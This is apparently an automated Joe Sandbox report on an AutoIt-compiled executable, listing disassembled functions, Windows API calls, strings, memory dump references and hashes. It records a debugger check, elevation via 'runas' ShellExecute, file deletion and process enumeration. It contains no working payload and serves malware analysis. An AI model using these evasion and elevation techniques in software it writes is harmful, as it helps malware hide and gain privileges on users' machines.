                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00AE3368,?), ref: 00AE33CE
                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00BB2418,00BB2400,?,?,?,?,?,?,00AE3368,?), ref: 00AE343A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AE3462,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00AE42A0
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00AE34BB
                                                                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B23CB0
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00B23CF1
                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BA31F4,00BB2418,?,?,?,?,?,?,?,00AE3368), ref: 00B23D7A
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B23D81
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE34D3: GetSysColorBrush.USER32(0000000F), ref: 00AE34DE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00AE34ED
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE34D3: LoadIconW.USER32(00000063), ref: 00AE3503
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE34D3: LoadIconW.USER32(000000A4), ref: 00AE3515
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE34D3: LoadIconW.USER32(000000A2), ref: 00AE3527
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE353F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE34D3: RegisterClassExW.USER32(?), ref: 00AE3590
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE35E1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3602
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE3616
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE361F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE3A3C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B23CAA
                                                                                                                                                                                                                                                                                    • runas, xrefs: 00B23D75
                                                                                                                                                                                                                                                                                    • AutoIt, xrefs: 00B23CA5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                    • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                    • Opcode ID: fa8b8e122fc4862d871b53c4fb47eb43224e9a70139268be077a5dbed925d318
                                                                                                                                                                                                                                                                                    • Instruction ID: 5e1658da4263b4fe6962db2b24db3e9f920e8f57fb0f680c846bd99eb67af5c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa8b8e122fc4862d871b53c4fb47eb43224e9a70139268be077a5dbed925d318
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A951E472108380AFDB05EF619D159BB7BF89F95780F040968F586532A2DFA48A89C722

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4EAB0: GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B4DCCB
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DD1B
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B4DD2C
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4DD43
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4DD4C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                    • Opcode ID: 352073451f256dbe76c94f8974bff7fac95039fa1b6491e23cc15a4d7bc830ba
                                                                                                                                                                                                                                                                                    • Instruction ID: 48a3dbadb40ed695dc3073a67e457f3d903275889cb78589c73930176ff2e7d4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 352073451f256dbe76c94f8974bff7fac95039fa1b6491e23cc15a4d7bc830ba
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6314931418385AFC301EF60DE958AFB7E8AE95304F404E6DF4D583192EF21DA0ADB62
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00B4DDAC
                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00B4DDBA
                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00B4DDDA
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B4DE87
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 88288cef7c0393e2f1d20231e7f4a07899336538d56b857f90a6d736cc4940b9
                                                                                                                                                                                                                                                                                    • Instruction ID: 43e55cfbe8da4a182751b5f6539e5a66fb4459cbbd0923c6677916059d0b9d07
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88288cef7c0393e2f1d20231e7f4a07899336538d56b857f90a6d736cc4940b9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E318D711083419FD701EF64CC85AAFBBF8EF99340F44096DF585871A1EB719A49CBA2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                    • Instruction ID: 016821a7a4eaf3ea01914a28e57ff8ba16058255711124d2be1977b0e283b40b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9731C170A14109DBC718EE58D490B69FBE6FB49300F2486E5E409CB292E632EDC1CB80
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00AEEF07
                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00AEF107
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AEF228
                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00AEF27B
                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00AEF289
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AEF29F
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00AEF2B1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 477dea36bd41e6eb8de95a834a12feb00fcb04a8762b8d10e89a970c6c9e43b3
                                                                                                                                                                                                                                                                                    • Instruction ID: a2768a0480d47868677ae7a634d92db1576d80d3531ae40395409fbc3e21bba5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 477dea36bd41e6eb8de95a834a12feb00fcb04a8762b8d10e89a970c6c9e43b3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6832F430604782EFD728CF25C884BAABBE5FF81704F24466DF55997291DB71E984CB82

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00AE3657
                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00AE3681
                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE3692
                                                                                                                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00AE36AF
                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE36BF
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00AE36D5
                                                                                                                                                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE36E4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                    • Opcode ID: 422d4074771172113554033af56af69053cbf7930a5f1f1e35ce1a8fb8842635
                                                                                                                                                                                                                                                                                    • Instruction ID: b644bc7dc6c4bde5702a5b1108a0d204fa1f93a5b2ce08b73ec053df91c5bc83
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 422d4074771172113554033af56af69053cbf7930a5f1f1e35ce1a8fb8842635
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7621C3B1D01258AFDB00DFA4EC89B9DBBB4FB08750F00521AF659A72A0DBB545848F95

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 369 b209db-b20a0b call b207af 372 b20a26-b20a32 call b15594 369->372 373 b20a0d-b20a18 call b0f636 369->373 379 b20a34-b20a49 call b0f636 call b0f649 372->379 380 b20a4b-b20a94 call b2071a 372->380 378 b20a1a-b20a21 call b0f649 373->378 389 b20cfd-b20d03 378->389 379->378 387 b20b01-b20b0a GetFileType 380->387 388 b20a96-b20a9f 380->388 393 b20b53-b20b56 387->393 394 b20b0c-b20b3d GetLastError call b0f613 CloseHandle 387->394 391 b20aa1-b20aa5 388->391 392 b20ad6-b20afc GetLastError call b0f613 388->392 391->392 398 b20aa7-b20ad4 call b2071a 391->398 392->378 396 b20b58-b20b5d 393->396 397 b20b5f-b20b65 393->397 394->378 408 b20b43-b20b4e call b0f649 394->408 401 b20b69-b20bb7 call b154dd 396->401 397->401 402 b20b67 397->402 398->387 398->392 412 b20bc7-b20beb call b204cd 401->412 413 b20bb9-b20bc5 call b2092b 401->413 402->401 408->378 419 b20bfe-b20c41 412->419 420 b20bed 412->420 413->412 418 b20bef-b20bf9 call b18a2e 413->418 418->389 422 b20c62-b20c70 419->422 423 b20c43-b20c47 419->423 420->418 426 b20c76-b20c7a 422->426 427 b20cfb 422->427 423->422 425 b20c49-b20c5d 423->425 425->422 426->427 428 b20c7c-b20caf CloseHandle call b2071a 426->428 427->389 431 b20ce3-b20cf7 428->431 432 b20cb1-b20cdd GetLastError call b0f613 call b156a6 428->432 431->427 432->431
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B2071A: CreateFileW.KERNEL32(00000000,00000000,?,00B20A84,?,?,00000000,?,00B20A84,00000000,0000000C), ref: 00B20737
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B20AEF
                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B20AF6
                                                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00B20B02
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B20B0C
                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B20B15
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B20B35
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B20C7F
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B20CB1
                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B20CB8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                    • Opcode ID: 32077f801906410839d2546dba3ee206f6ffeb62cfebee1af04726126a0d1bef
                                                                                                                                                                                                                                                                                    • Instruction ID: 0de6ec0e3de2d0c2d3104d1b2e9da7aa81bb70953e043299549c97b03bf6e70d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32077f801906410839d2546dba3ee206f6ffeb62cfebee1af04726126a0d1bef
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63A12832A201198FDF29EF68E895BAD7BE1EB06324F140199F815DB2D2DB319C12CB51

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00AE55B2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AE525A
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AE53C4
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B24BFD
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B24C3E
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B24C80
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B24CE7
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B24CF6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                    • Opcode ID: 8e1e72da456e569b57baf57d3c266e848a5f3567403eed2570e8cf59f63613f9
                                                                                                                                                                                                                                                                                    • Instruction ID: 21576dba45e4308e7e972356a0e34de934f569556fefb20058c55ccecaf73101
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e1e72da456e569b57baf57d3c266e848a5f3567403eed2570e8cf59f63613f9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B719C715143019FC300EF2AE9819ABBBF8FF58780F80496DF444871A0DFB19A49CB65

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00AE34DE
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00AE34ED
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00AE3503
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00AE3515
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00AE3527
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE353F
                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00AE3590
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: GetSysColorBrush.USER32(0000000F), ref: 00AE3657
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: RegisterClassExW.USER32(00000030), ref: 00AE3681
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE3692
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: InitCommonControlsEx.COMCTL32(?), ref: 00AE36AF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE36BF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: LoadIconW.USER32(000000A9), ref: 00AE36D5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE36E4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                    • Opcode ID: 3a5975f5b81bf02b3201b9c4be5b38a826d88c1f82fcc4478b4c620dfb17d17b
